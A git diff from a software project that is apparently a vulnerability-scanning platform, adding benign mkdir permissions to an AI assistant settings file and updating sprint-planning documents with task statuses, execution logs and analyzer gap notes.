diff --git a/.claude/settings.local.json b/.claude/settings.local.json
index dd87c456f..192b37cb4 100644
--- a/.claude/settings.local.json
+++ b/.claude/settings.local.json
@@ -23,7 +23,9 @@
"Bash(test:*)",
"Bash(taskkill:*)",
"Bash(timeout /t)",
- "Bash(dotnet clean:*)"
+ "Bash(dotnet clean:*)",
+ "Bash(if not exist \"E:\\dev\\git.stella-ops.org\\src\\Scanner\\__Tests\\StellaOps.Scanner.Analyzers.Lang.Java.Tests\\Internal\" mkdir \"E:\\dev\\git.stella-ops.org\\src\\Scanner\\__Tests\\StellaOps.Scanner.Analyzers.Lang.Java.Tests\\Internal\")",
+ "Bash(if not exist \"E:\\dev\\git.stella-ops.org\\src\\Scanner\\__Tests\\StellaOps.Scanner.Analyzers.Lang.Node.Tests\\Internal\" mkdir \"E:\\dev\\git.stella-ops.org\\src\\Scanner\\__Tests\\StellaOps.Scanner.Analyzers.Lang.Node.Tests\\Internal\")"
],
"deny": [],
"ask": []
diff --git a/Directory.Build.props b/Directory.Build.props
index a0bca4c43..413301f53 100644
--- a/Directory.Build.props
+++ b/Directory.Build.props
@@ -21,11 +21,11 @@
false
true
-
+ clear
clear
-
+ clear
clear
-
+ clear
clear
true
diff --git a/NuGet.config b/NuGet.config
index 65cf28223..d935013c4 100644
--- a/NuGet.config
+++ b/NuGet.config
@@ -1,7 +1,9 @@
-
-
+
+
+
+
diff --git a/docs/implplan/SPRINT_0120_0001_0001_policy_reasoning.md b/docs/implplan/SPRINT_0120_0001_0001_policy_reasoning.md
index ca47bfef0..6055fbb0b 100644
--- a/docs/implplan/SPRINT_0120_0001_0001_policy_reasoning.md
+++ b/docs/implplan/SPRINT_0120_0001_0001_policy_reasoning.md
@@ -15,6 +15,7 @@
**External dependency tracker**
| Dependency | Current state (2025-11-13) | Impact |
| --- | --- | --- |
+| DevOps deploy asset paths | Approved (2025-12-07) under `ops/devops/findings-ledger/**` | Unblocks LEDGER-29-009-DEV; task set to TODO (Project Mgmt). |
| Sprint 110.A AdvisoryAI | DONE | Enables Findings.I start; monitor regressions. |
| Observability metric schema | IN REVIEW | Blocks LEDGER-29-007/008 dashboards. |
| Orchestrator job export contract | DONE (2025-12-03) | Contract documented in `docs/modules/orchestrator/job-export-contract.md`; usable for LEDGER-34-101 linkage. |
@@ -55,7 +56,7 @@
| P3 | PREP-LEDGER-AIRGAP-56-001-MIRROR-BUNDLE-SCHEM | DONE (2025-11-22) | Due 2025-11-21 · Accountable: Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Mirror bundle provenance fields frozen in `docs/modules/findings-ledger/prep/2025-11-22-ledger-airgap-prep.md`; staleness/anchor rules defined. |
| 1 | LEDGER-29-007 | DONE (2025-11-17) | Observability metric schema sign-off; deps LEDGER-29-006 | Findings Ledger Guild, Observability Guild / `src/Findings/StellaOps.Findings.Ledger` | Instrument `ledger_write_latency`, `projection_lag_seconds`, `ledger_events_total`, structured logs, Merkle anchoring alerts, and publish dashboards. |
| 2 | LEDGER-29-008 | DONE (2025-11-22) | PREP-LEDGER-29-008-AWAIT-OBSERVABILITY-SCHEMA | Findings Ledger Guild, QA Guild / `src/Findings/StellaOps.Findings.Ledger` | Develop unit/property/integration tests, replay/restore tooling, determinism harness, and load tests at 5 M findings/tenant. |
-| 3 | LEDGER-29-009-DEV | BLOCKED | DEPLOY-LEDGER-29-009 (SPRINT_0501_0001_0001_ops_deployment_i) — waiting on DevOps to assign target paths for Helm/Compose/offline-kit assets; backup/restore runbook review pending | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Provide Helm/Compose manifests, backup/restore guidance, optional Merkle anchor externalization, and offline kit instructions (dev/staging artifacts). |
+| 3 | LEDGER-29-009-DEV | TODO | Asset paths approved under `ops/devops/findings-ledger/**`; implement Compose/Helm/offline-kit overlays and finalize backup/restore runbook. | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Provide Helm/Compose manifests, backup/restore guidance, optional Merkle anchor externalization, and offline kit instructions (dev/staging artifacts). |
| 4 | LEDGER-34-101 | DONE (2025-11-22) | PREP-LEDGER-34-101-ORCHESTRATOR-LEDGER-EXPORT | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Link orchestrator run ledger exports into Findings Ledger provenance chain, index by artifact hash, and expose audit queries. Contract reference: `docs/modules/orchestrator/job-export-contract.md`. |
| 5 | LEDGER-AIRGAP-56-001 | DONE (2025-11-22) | PREP-LEDGER-AIRGAP-56-001-MIRROR-BUNDLE-SCHEM | Findings Ledger Guild / `src/Findings/StellaOps.Findings.Ledger` | Record bundle provenance (`bundle_id`, `merkle_root`, `time_anchor`) on ledger events for advisories/VEX/policies imported via Mirror Bundles. |
| 6 | LEDGER-AIRGAP-56-002 | **DONE** (2025-12-06) | Implemented AirGapOptions, StalenessValidationService, staleness metrics. | Findings Ledger Guild, AirGap Time Guild / `src/Findings/StellaOps.Findings.Ledger` | Surface staleness metrics for findings and block risk-critical exports when stale beyond thresholds; provide remediation messaging. |
@@ -107,8 +108,8 @@
- Air-gap drift risk: mirror bundle format still moving; mitigation is to version the provenance schema and gate LEDGER-AIRGAP-* merges until docs/manifests updated.
- Cross-guild lag risk: Orchestrator/Attestor dependencies may delay provenance pointers; mitigation is weekly sync notes and feature flags so ledger work can land behind toggles.
- Implementer contract now anchored in `src/Findings/AGENTS.md`; keep in sync with module docs and update sprint log when changed.
-- Remaining blocks: LEDGER-29-009 still waits on DevOps/offline review of backup/restore collateral; AIRGAP-56-002/57/58 and ATTEST-73 remain blocked on their upstream freshness/timeline/attestation specs.
-- Deployment asset path risk: Helm/Compose/offline kit overlays sit outside the module working directory; need DevOps-provided target directories before committing manifests (blocks LEDGER-29-009).
+- Remaining blocks: AIRGAP-56-002/57/58 and ATTEST-73 remain blocked on upstream freshness/timeline/attestation specs; LEDGER-29-009 now proceeding with approved asset paths.
+- Deployment asset paths approved: use `ops/devops/findings-ledger/compose`, `ops/devops/findings-ledger/helm`, and `ops/devops/findings-ledger/offline-kit` for manifests and kits; update runbook accordingly.
- Backup collateral risk: until DevOps approves storage locations, backup/restore runbook lives only in `docs/modules/findings-ledger/deployment.md`; implementers must not commit manifests outside module paths.
## Next Checkpoints
diff --git a/docs/implplan/SPRINT_0120_0001_0002_excititor_ii.md b/docs/implplan/SPRINT_0120_0001_0002_excititor_ii.md
index ac9b9881e..f39d909b6 100644
--- a/docs/implplan/SPRINT_0120_0001_0002_excititor_ii.md
+++ b/docs/implplan/SPRINT_0120_0001_0002_excititor_ii.md
@@ -24,7 +24,7 @@
| 1 | EXCITITOR-CONSOLE-23-001/002/003 | DONE (2025-11-23) | Dependent APIs live | Excititor Guild · Docs Guild | Console VEX endpoints (grouped statements, counts, search) with provenance + RBAC; metrics for policy explain. |
| 2 | EXCITITOR-CONN-SUSE-01-003 | **DONE** (2025-12-07) | Integrated ConnectorSignerMetadataEnricher in provenance | Connector Guild (SUSE) | Emit trust config (signer fingerprints, trust tier) in provenance; aggregation-only. |
| 3 | EXCITITOR-CONN-UBUNTU-01-003 | **DONE** (2025-12-07) | Verified enricher integration, fixed Logger reference | Connector Guild (Ubuntu) | Emit Ubuntu signing metadata in provenance; aggregation-only. |
-| 4 | EXCITITOR-CORE-AOC-19-002/003/004/013 | TODO | ATLN schema freeze | Excititor Core Guild | Deterministic advisory/PURL extraction, append-only linksets, remove consensus logic, seed Authority tenants in tests. |
+| 4 | EXCITITOR-CORE-AOC-19-002/003/004/013 | **DONE** (2025-12-07) | Implemented append-only linkset contracts and deprecated consensus | Excititor Core Guild | Deterministic advisory/PURL extraction, append-only linksets, remove consensus logic, seed Authority tenants in tests. |
| 5 | EXCITITOR-GRAPH-21-001..005 | TODO/BLOCKED | Link-Not-Merge schema + overlay contract | Excititor Core · Storage Mongo · UI Guild | Batched VEX fetches, overlay metadata, indexes/materialized views for graph inspector. |
| 6 | EXCITITOR-OBS-52/53/54 | TODO/BLOCKED | Evidence Locker DSSE + provenance schema | Excititor Core · Evidence Locker · Provenance Guilds | Timeline events + Merkle locker payloads + DSSE attestations for evidence batches. |
| 7 | EXCITITOR-ORCH-32/33 | PARTIAL (2025-12-06) | Created orchestration integration files; blocked on missing Storage.Mongo project | Excititor Worker Guild | Adopt orchestrator worker SDK; honor pause/throttle/retry with deterministic checkpoints. |
@@ -53,6 +53,7 @@
## Execution Log
| Date (UTC) | Update | Owner |
| --- | --- | --- |
+| 2025-12-07 | **EXCITITOR-CORE-AOC-19 DONE:** Implemented append-only linkset infrastructure: (1) Created `IAppendOnlyLinksetStore` interface with append-only semantics for observations and disagreements, plus mutation log for audit/replay (AOC-19-002); (2) Marked `VexConsensusResolver`, `VexConsensus`, `IVexConsensusPolicy`, `BaselineVexConsensusPolicy`, and related types as `[Obsolete]` with EXCITITOR001 diagnostic ID per AOC-19-003; (3) Created `AuthorityTenantSeeder` utility with test tenant fixtures (default, multi-tenant, airgap) and SQL generation for AOC-19-004; (4) Created `AppendOnlyLinksetExtractionService` replacing consensus-based extraction with deterministic append-only operations per AOC-19-013; (5) Added comprehensive unit tests for both new services with in-memory store implementation. | Implementer |
| 2025-12-07 | **EXCITITOR-CONN-SUSE-01-003 & EXCITITOR-CONN-UBUNTU-01-003 DONE:** Integrated `ConnectorSignerMetadataEnricher.Enrich()` into both connectors' `AddProvenanceMetadata()` methods. This adds external signer metadata (fingerprints, issuer tier, bundle info) from `STELLAOPS_CONNECTOR_SIGNER_METADATA_PATH` environment variable to VEX document provenance. Fixed Ubuntu connector's `_logger` → `Logger` reference bug. | Implementer |
| 2025-12-05 | Reconstituted sprint from `tasks-all.md`; prior redirect pointed to non-existent canonical. Added template and delivery tracker; tasks set per backlog. | Project Mgmt |
| 2025-11-23 | Console VEX endpoints (tasks 1) delivered. | Excititor Guild |
diff --git a/docs/implplan/SPRINT_0128_0001_0001_policy_reasoning.md b/docs/implplan/SPRINT_0128_0001_0001_policy_reasoning.md
index 2d7381807..3822f6da9 100644
--- a/docs/implplan/SPRINT_0128_0001_0001_policy_reasoning.md
+++ b/docs/implplan/SPRINT_0128_0001_0001_policy_reasoning.md
@@ -11,7 +11,7 @@
## Wave Coordination
- **Wave A (SPL schema/tooling):** Tasks 10–15 DONE; keep SPL schema/fixtures/canonicalizer/layering stable.
- **Wave B (risk profile lifecycle APIs):** Tasks 1–2 DONE; publish schema and lifecycle endpoints; hold steady for downstream consumers.
-- **Wave C (risk simulations/overrides/exports/notifications/air-gap):** Tasks 3–7, 9 TODO; unblocked by contracts ([RISK-SCORING-002](../contracts/risk-scoring.md), [POLICY-STUDIO-007](../contracts/policy-studio.md), [AUTHORITY-EFFECTIVE-WRITE-008](../contracts/authority-effective-write.md), [MIRROR-BUNDLE-003](../contracts/mirror-bundle.md), [SEALED-MODE-004](../contracts/sealed-mode.md)). Task 8 remains BLOCKED on notifications contract.
+- **Wave C (risk simulations/overrides/exports/notifications/air-gap):** Tasks 3–7, 9 TODO; unblocked by contracts ([RISK-SCORING-002](../contracts/risk-scoring.md), [POLICY-STUDIO-007](../contracts/policy-studio.md), [AUTHORITY-EFFECTIVE-WRITE-008](../contracts/authority-effective-write.md), [MIRROR-BUNDLE-003](../contracts/mirror-bundle.md), [SEALED-MODE-004](../contracts/sealed-mode.md)). Task 8 (notifications) now unblocked; proceed with policy notifications implementation using `docs/modules/policy/notifications.md`.
- No additional work in progress; avoid starting Wave C until dependencies clear.
## Documentation Prerequisites
@@ -32,7 +32,7 @@
| 5 | POLICY-RISK-68-001 | DONE (2025-12-06) | Unblocked by [CONTRACT-AUTHORITY-EFFECTIVE-WRITE-008](../contracts/authority-effective-write.md). | Risk Profile Schema Guild · Authority Guild / `src/Policy/StellaOps.Policy.RiskProfile` | Scope selectors, precedence rules, Authority attachment. |
| 6 | POLICY-RISK-68-002 | DONE (2025-12-06) | Unblocked by [CONTRACT-RISK-SCORING-002](../contracts/risk-scoring.md) (RiskOverrides included). | Risk Profile Schema Guild / `src/Policy/StellaOps.Policy.RiskProfile` | Override/adjustment support with audit metadata. |
| 7 | POLICY-RISK-68-002 | DONE (2025-12-06) | Unblocked; can proceed after task 6 with [CONTRACT-EXPORT-BUNDLE-009](../contracts/export-bundle.md). | Policy · Export Guild / `src/Policy/__Libraries/StellaOps.Policy` | Export/import RiskProfiles with signatures. |
-| 8 | POLICY-RISK-69-001 | BLOCKED | Blocked by 68-002 and notifications contract (not yet published). | Policy · Notifications Guild / `src/Policy/StellaOps.Policy.Engine` | Notifications on profile lifecycle/threshold changes. |
+| 8 | POLICY-RISK-69-001 | TODO | Notifications contract published at `docs/modules/policy/notifications.md`. | Policy · Notifications Guild / `src/Policy/StellaOps.Policy.Engine` | Notifications on profile lifecycle/threshold changes. |
| 9 | POLICY-RISK-70-001 | DONE (2025-12-06) | Unblocked by [CONTRACT-MIRROR-BUNDLE-003](../contracts/mirror-bundle.md) and [CONTRACT-SEALED-MODE-004](../contracts/sealed-mode.md). | Policy · Export Guild / `src/Policy/StellaOps.Policy.Engine` | Air-gap export/import for profiles with signatures. |
| 10 | POLICY-SPL-23-001 | DONE (2025-11-25) | — | Policy · Language Infrastructure Guild / `src/Policy/__Libraries/StellaOps.Policy` | Define SPL v1 schema + fixtures. |
| 11 | POLICY-SPL-23-002 | DONE (2025-11-26) | SPL canonicalizer + digest delivered; proceed to layering engine. | Policy Guild / `src/Policy/__Libraries/StellaOps.Policy` | Canonicalizer + content hashing. |
@@ -44,6 +44,7 @@
## Execution Log
| Date (UTC) | Update | Owner |
| --- | --- | --- |
+| 2025-12-07 | Published notifications contract at `docs/modules/policy/notifications.md`; set POLICY-RISK-69-001 to TODO. | Project Mgmt |
| 2025-12-03 | Added Wave Coordination (A SPL tooling done; B risk lifecycle APIs done; C simulations/overrides/exports/notifications/air-gap blocked). No status changes. | Project Mgmt |
| 2025-11-27 | `POLICY-RISK-67-002` (task 2): Added `RiskProfileSchemaEndpoints.cs` with `/.well-known/risk-profile-schema` endpoint (anonymous, ETag/Cache-Control, schema v1) and `/api/risk/schema/validate` POST endpoint for profile validation. Extended `RiskProfileSchemaProvider` with GetSchemaText(), GetSchemaVersion(), and GetETag() methods. Added `risk-profile` CLI command group with `validate` (--input, --format, --output, --strict) and `schema` (--output) subcommands. Added RiskProfile project reference to CLI. | Implementer |
| 2025-11-27 | `POLICY-RISK-67-002` (task 1): Created `Endpoints/RiskProfileEndpoints.cs` with REST APIs for profile lifecycle management: ListProfiles, GetProfile, ListVersions, GetVersion, CreateProfile (draft), ActivateProfile, DeprecateProfile, ArchiveProfile, GetProfileEvents, CompareProfiles, GetProfileHash. Uses `RiskProfileLifecycleService` for status transitions and `RiskProfileConfigurationService` for profile storage/hashing. Authorization via StellaOpsScopes (PolicyRead/PolicyEdit/PolicyActivate). Registered `RiskProfileLifecycleService` in DI and wired up `MapRiskProfiles()` in Program.cs. | Implementer |
@@ -71,7 +72,7 @@
## Decisions & Risks
- Risk profile contracts now available at [CONTRACT-RISK-SCORING-002](../contracts/risk-scoring.md); SPL schema delivered (tasks 10-15 DONE).
- Policy Studio, Authority, and air-gap contracts now published; most Wave C tasks unblocked.
-- Task 8 (POLICY-RISK-69-001) remains BLOCKED pending notifications contract.
+- Task 8 (POLICY-RISK-69-001) unblocked by notifications contract at `docs/modules/policy/notifications.md`; ready for implementation.
// Tests
- PolicyValidationCliTests: pass in graph-disabled slice; blocked in full repo due to static graph pulling unrelated modules. Mitigation: run in CI with DOTNET_DISABLE_BUILTIN_GRAPH=1 against policy-only solution via `scripts/tests/run-policy-cli-tests.sh` (Linux/macOS) or `scripts/tests/run-policy-cli-tests.ps1` (Windows).
diff --git a/docs/implplan/SPRINT_0129_0001_0001_policy_reasoning.md b/docs/implplan/SPRINT_0129_0001_0001_policy_reasoning.md
index e66d3762c..308d56a36 100644
--- a/docs/implplan/SPRINT_0129_0001_0001_policy_reasoning.md
+++ b/docs/implplan/SPRINT_0129_0001_0001_policy_reasoning.md
@@ -10,7 +10,7 @@
## Wave Coordination
- **Wave A (RiskEngine + Vuln API):** Tasks 12–18 and 35–37 DONE; keep schemas/fixtures stable.
- **Wave B (Registry API):** Tasks 2–11 UNBLOCKED; OpenAPI spec available at `docs/schemas/policy-registry-api.openapi.yaml`. Run sequentially.
-- **Wave C (Policy tenancy):** Task 1 BLOCKED on platform RLS design; align with Registry once available.
+- **Wave C (Policy tenancy):** Task 1 TODO using RLS design at `docs/modules/policy/prep/tenant-rls.md`; align with Registry.
- **Wave D (VEX Lens):** Tasks 19–34 DONE (2025-12-06); VEX Lens module complete.
- Wave B (Registry API) is now the active work queue.
@@ -26,7 +26,7 @@
## Delivery Tracker
| # | Task ID & handle | State | Key dependency / next step | Owners | Task Definition |
| --- | --- | --- | --- | --- | --- |
-| 1 | POLICY-TEN-48-001 | BLOCKED | Tenant/project columns + RLS policy; needs platform-approved design. | Policy Guild / `src/Policy/StellaOps.Policy.Engine` | Tenant scoping + rationale IDs with tenant metadata. |
+| 1 | POLICY-TEN-48-001 | TODO | Tenant/project RLS design published at `docs/modules/policy/prep/tenant-rls.md`. | Policy Guild / `src/Policy/StellaOps.Policy.Engine` | Tenant scoping + rationale IDs with tenant metadata. |
| 2 | REGISTRY-API-27-001 | DONE (2025-12-06) | OpenAPI spec available; typed client implemented. | Policy Registry Guild / `src/Policy/StellaOps.Policy.Registry` | Define Registry API spec + typed clients. |
| 3 | REGISTRY-API-27-002 | DONE (2025-12-06) | Depends on 27-001; implemented. | Policy Registry Guild / `src/Policy/StellaOps.Policy.Registry` | Workspace storage with CRUD + history. |
| 4 | REGISTRY-API-27-003 | DONE (2025-12-06) | Depends on 27-002; implemented. | Policy Registry Guild / `src/Policy/StellaOps.Policy.Registry` | Compile endpoint integration. |
@@ -67,6 +67,7 @@
## Execution Log
| Date (UTC) | Update | Owner |
| --- | --- | --- |
+| 2025-12-07 | Published tenant/project RLS design at `docs/modules/policy/prep/tenant-rls.md`; set POLICY-TEN-48-001 to TODO. | Project Mgmt |
| 2025-12-06 | REGISTRY-API-27-010 DONE: Created test suites and fixtures. Implemented `PolicyRegistryTestHarness` (integration test harness with all services wired, determinism testing), `PolicyRegistryTestFixtures` (test data generators for rules, simulation inputs, batch inputs, verification policies, snapshots, violations, overrides). Supports full workflow testing from pack creation through promotion. **Wave B complete: all 10 Registry API tasks (27-001 through 27-010) now DONE.** Build succeeds with no errors. | Implementer |
| 2025-12-06 | REGISTRY-API-27-009 DONE: Created observability infrastructure. Implemented `PolicyRegistryMetrics` (System.Diagnostics.Metrics with counters/histograms/gauges for packs, compilations, simulations, reviews, promotions), `PolicyRegistryActivitySource` (distributed tracing with activity helpers for all operations), `PolicyRegistryLogEvents` (structured logging event IDs 1000-1999 with log message templates). Covers full lifecycle from pack creation through promotion. Build succeeds with no errors. | Implementer |
| 2025-12-06 | REGISTRY-API-27-008 DONE: Created promotion bindings per tenant/environment. Implemented `IPromotionService` interface and `PromotionService` with environment binding management, promotion validation, rollback support, promotion history tracking. Provides `PromoteAsync`, `RollbackAsync`, `GetActiveForEnvironmentAsync`, `ValidatePromotionAsync`, `GetHistoryAsync`. Added binding modes (Manual, AutomaticOnApproval, Scheduled, Canary), binding rules with approval requirements, and validation for staging→production promotions. Added `AddPromotionService` DI extension. Build succeeds with no errors. | Implementer |
@@ -118,6 +119,7 @@
| 2025-11-25 | Work paused: repository cannot allocate PTY (`No space left on device`); further execution awaits workspace cleanup. | Implementer |
## Decisions & Risks
+- Policy tenancy RLS design published at `docs/modules/policy/prep/tenant-rls.md`; use as contract for POLICY-TEN-48-001.
- Multiple upstream specs missing (Registry API, Risk Engine contracts, VEX consensus schema, issuer directory, API governance, VulnExplorer API); VEXLENS-30-001 blocked until normalization + issuer inputs land; downstream tasks depend on it.
## Next Checkpoints
diff --git a/docs/implplan/SPRINT_0143_0001_0001_signals.md b/docs/implplan/SPRINT_0143_0001_0001_signals.md
index dd76c8182..faf75de66 100644
--- a/docs/implplan/SPRINT_0143_0001_0001_signals.md
+++ b/docs/implplan/SPRINT_0143_0001_0001_signals.md
@@ -25,8 +25,8 @@
| P2 | PREP-SIGNALS-24-002-CAS-PROMO | DONE (2025-11-19) | Due 2025-11-22 · Accountable: Signals Guild · Platform Storage Guild | Signals Guild · Platform Storage Guild | CAS promotion checklist and manifest schema published at `docs/signals/cas-promotion-24-002.md`; awaiting storage approval to execute. |
| P3 | PREP-SIGNALS-24-003-PROVENANCE | DONE (2025-11-19) | Due 2025-11-22 · Accountable: Signals Guild · Runtime Guild · Authority Guild | Signals Guild · Runtime Guild · Authority Guild | Provenance appendix fields and checklist published at `docs/signals/provenance-24-003.md`; awaiting schema/signing approval to execute. |
| 1 | SIGNALS-24-001 | DONE (2025-11-09) | Dependency AUTH-SIG-26-001; merged host skeleton with scope policies and evidence validation. | Signals Guild, Authority Guild | Stand up Signals API skeleton with RBAC, sealed-mode config, DPoP/mTLS enforcement, and `/facts` scaffolding so downstream ingestion can begin. |
-| 2 | SIGNALS-24-002 | TODO | ✅ CAS APPROVED (2025-12-06): Contract at `docs/contracts/cas-infrastructure.md`; provenance schema at `docs/schemas/provenance-feed.schema.json`. Ready for implementation. | Signals Guild | Implement callgraph ingestion/normalization (Java/Node/Python/Go) with CAS persistence and retrieval APIs to feed reachability scoring. |
-| 3 | SIGNALS-24-003 | TODO | ✅ CAS approved + provenance schema available at `docs/schemas/provenance-feed.schema.json`. Ready for implementation. | Signals Guild, Runtime Guild | Implement runtime facts ingestion endpoint and normalizer (process, sockets, container metadata) populating `context_facts` with AOC provenance. |
+| 2 | SIGNALS-24-002 | DOING | CAS storage implementation started. RustFS driver added to Signals storage options; `RustFsCallgraphArtifactStore` with CAS persistence complete; retrieval APIs added to interface. | Signals Guild | Implement callgraph ingestion/normalization (Java/Node/Python/Go) with CAS persistence and retrieval APIs to feed reachability scoring. |
+| 3 | SIGNALS-24-003 | **DONE** (2025-12-07) | AOC provenance models + normalizer + context_facts wiring complete | Signals Guild, Runtime Guild | Implement runtime facts ingestion endpoint and normalizer (process, sockets, container metadata) populating `context_facts` with AOC provenance. |
| 4 | SIGNALS-24-004 | DONE (2025-11-17) | Scoring weights now configurable; runtime ingestion auto-triggers recompute into `reachability_facts`. | Signals Guild, Data Science | Deliver reachability scoring engine producing states/scores and writing to `reachability_facts`; expose configuration for weights. |
| 5 | SIGNALS-24-005 | DONE (2025-11-26) | PREP-SIGNALS-24-005-REDIS-CACHE-IMPLEMENTED-A | Signals Guild, Platform Events Guild | Implement Redis caches (`reachability_cache:*`), invalidation on new facts, and publish `signals.fact.updated` events. |
@@ -41,6 +41,8 @@
## Execution Log
| Date (UTC) | Update | Owner |
| --- | --- | --- |
+| 2025-12-07 | **SIGNALS-24-003 DONE:** Implemented runtime facts ingestion AOC provenance: (1) Created `AocProvenance.cs` with full provenance-feed.schema.json models (`ProvenanceFeed`, `ProvenanceRecord`, `ProvenanceSubject`, `RuntimeProvenanceFacts`, `RecordEvidence`, `FeedAttestation`, `ContextFacts`); (2) Added `ContextFacts` field to `ReachabilityFactDocument` for storing provenance; (3) Created `RuntimeFactsProvenanceNormalizer` service that converts runtime events to AOC provenance records with proper record types (process.observed, network.connection, container.activity, package.loaded, symbol.invoked), subject types, confidence scoring, and evidence capture method detection; (4) Updated `RuntimeFactsIngestionService` to populate `context_facts` during ingestion with AOC metadata (version, contract, correlation); (5) Registered normalizer in DI; (6) Added 19 comprehensive unit tests for normalizer covering all record types, confidence scoring, evidence building, and metadata handling. Build succeeds; 20/20 runtime facts tests pass. | Implementer |
+| 2025-12-07 | **SIGNALS-24-002 CAS storage in progress:** Added RustFS driver support to Signals storage options (`SignalsArtifactStorageOptions`), created `RustFsCallgraphArtifactStore` with full CAS persistence (immutable, 90-day retention per contract), extended `ICallgraphArtifactStore` with retrieval methods (`GetAsync`, `GetManifestAsync`, `ExistsAsync`), updated `FileSystemCallgraphArtifactStore` to implement new interface, wired DI for driver-based selection. Configuration sample updated at `etc/signals.yaml.sample`. Build succeeds; 5/6 tests pass (1 pre-existing ZIP test failure unrelated). | Implementer |
| 2025-12-06 | **CAS Blocker Resolved:** SIGNALS-24-002 and SIGNALS-24-003 changed from BLOCKED to TODO. CAS Infrastructure Contract APPROVED at `docs/contracts/cas-infrastructure.md`; provenance schema at `docs/schemas/provenance-feed.schema.json`. Ready for implementation. | Implementer |
| 2025-12-05 | DSSE dev-signing available from Sprint 0140: decay/unknowns/heuristics bundles staged under `evidence-locker/signals/2025-12-05/` (dev key, tlog off). Scoring outputs may need revalidation after production re-sign; keep SIGNALS-24-002/003 BLOCKED until CAS + prod signatures land. | Implementer |
| 2025-12-05 | Verified dev DSSE bundles via `cosign verify-blob --bundle evidence-locker/signals/2025-12-05/*.sigstore.json --key tools/cosign/cosign.dev.pub` (all OK). Pending production re-sign once Alice Carter key available. | Implementer |
diff --git a/docs/implplan/SPRINT_0146_0001_0001_scanner_analyzer_gap_close.md b/docs/implplan/SPRINT_0146_0001_0001_scanner_analyzer_gap_close.md
index 238a3464c..887441814 100644
--- a/docs/implplan/SPRINT_0146_0001_0001_scanner_analyzer_gap_close.md
+++ b/docs/implplan/SPRINT_0146_0001_0001_scanner_analyzer_gap_close.md
@@ -29,17 +29,28 @@
| 6 | SCAN-BUN-LOCKB-0146-06 | TODO | Decide parse vs enforce migration; update gotchas doc and readiness. | Scanner | Define bun.lockb policy (parser or remediation-only) and document; add tests if parsing. |
| 7 | SCAN-DART-SWIFT-SCOPE-0146-07 | TODO | Draft analyzer scopes + fixtures list; align with Signals/Zastava. | Scanner | Publish Dart/Swift analyzer scope note and task backlog; add to readiness checkpoints. |
| 8 | SCAN-RUNTIME-PARITY-0146-08 | TODO | Identify runtime hook gaps for Java/.NET/PHP; create implementation plan. | Scanner · Signals | Add runtime evidence plan and tasks; update readiness & surface docs. |
+| 9 | SCAN-RPM-BDB-0146-09 | TODO | Add rpmdb BerkeleyDB fallback + fixtures; wire into analyzer pipeline. | Scanner OS | Extend RPM analyzer to read legacy BDB `Packages` databases and add regression fixtures to avoid missing inventories on RHEL-family bases. |
+| 10 | SCAN-OS-FILES-0146-10 | TODO | Wire layer digest + hashing into OS file evidence and fragments. | Scanner OS | Emit layer attribution and stable digests/size for apk/dpkg/rpm file evidence and propagate into `analysis.layers.fragments` for diff/cache correctness. |
+| 11 | SCAN-NODE-PNP-0146-11 | TODO | Implement Yarn PnP resolution + tighten declared-only emissions. | Scanner Lang | Parse `.pnp.cjs/.pnp.data.json`, map cache zips to components/usage, and stop emitting declared-only packages without on-disk evidence. |
+| 12 | SCAN-PY-EGG-0146-12 | TODO | Add `.egg-info`/editable detection + metadata to Python analyzer. | Scanner Lang | Support egg-info/editable installs (setuptools/pip -e), including metadata/evidence and used-by-entrypoint flags. |
+| 13 | SCAN-NATIVE-REACH-0146-13 | TODO | Implement native reachability graph baseline (call edges, Unknowns). | Scanner Native | Add call-graph extraction, synthetic roots, build-id capture, purl/symbol digests, Unknowns emission, and DSSE graph bundles per reachability spec. |
## Execution Log
| Date (UTC) | Update | Owner |
| --- | --- | --- |
| 2025-12-07 | Sprint created to consolidate scanner analyzer gap closure tasks. | Planning |
+| 2025-12-07 | Logged additional analyzer gaps (rpm BDB, OS file evidence, Node PnP/declared-only, Python egg-info, native reachability graph) and opened tasks 9-13. | Planning |
## Decisions & Risks
- CI runner availability may delay Java/.NET/Node validation; mitigate by reserving dedicated runner slice.
- PHP autoload design depends on Concelier/Signals input; risk of further delay if contracts change.
- bun.lockb stance impacts customer guidance; ensure decision is documented and tests reflect chosen posture.
- Runtime parity tasks may uncover additional surface/telemetry changes—track in readiness until resolved.
+- RPM analyzer ignores legacy BerkeleyDB rpmdbs; inventories on RHEL-family images are empty until SCAN-RPM-BDB-0146-09 lands.
+- OS analyzers lack layer digest/hash attribution; diff/cache outputs may be incorrect until SCAN-OS-FILES-0146-10 lands.
+- Node analyzer emits declared-only packages and lacks Yarn PnP resolution; SBOMs can be inflated or missing real packages until SCAN-NODE-PNP-0146-11 ships.
+- Python analyzer skips `.egg-info`/editable installs; coverage gap remains until SCAN-PY-EGG-0146-12 ships.
+- Native analyzer lacks call-graph/Unknowns/purl binding; reachability outputs are incomplete until SCAN-NATIVE-REACH-0146-13 finishes.
## Next Checkpoints
- 2025-12-10: CI runner allocation decision.
diff --git a/docs/implplan/SPRINT_0212_0001_0001_web_i.md b/docs/implplan/SPRINT_0212_0001_0001_web_i.md
index 5186784b3..7e39b06b4 100644
--- a/docs/implplan/SPRINT_0212_0001_0001_web_i.md
+++ b/docs/implplan/SPRINT_0212_0001_0001_web_i.md
@@ -88,7 +88,7 @@
| Date (UTC) | Update | Owner |
| --- | --- | --- |
| 2025-12-07 | Drafted caching/tie-break rules and download manifest spec for `/console/search` and `/console/downloads`; added `docs/api/console/search-downloads.md` and sample `docs/api/console/samples/console-download-manifest.json`. Awaiting Policy/DevOps sign-off; keeps WEB-CONSOLE-23-004/005 formally BLOCKED until approved. | Project Mgmt |
-| 2025-12-07 | WEB-CONSOLE-23-003: console export client, store, and service specs now runnable locally using Playwright Chromium headless and `NG_PERSISTENT_BUILD_CACHE=1`; command: `CHROME_BIN=$HOME/.cache/ms-playwright/chromium-1140/chrome-linux/chrome NG_PERSISTENT_BUILD_CACHE=1 npm test -- --watch=false --browsers=ChromeHeadlessOffline --progress=false --include src/app/core/api/console-export.client.spec.ts,src/app/core/console/console-export.store.spec.ts,src/app/core/console/console-export.service.spec.ts`. Tests pass; backend contract still draft. | Implementer |
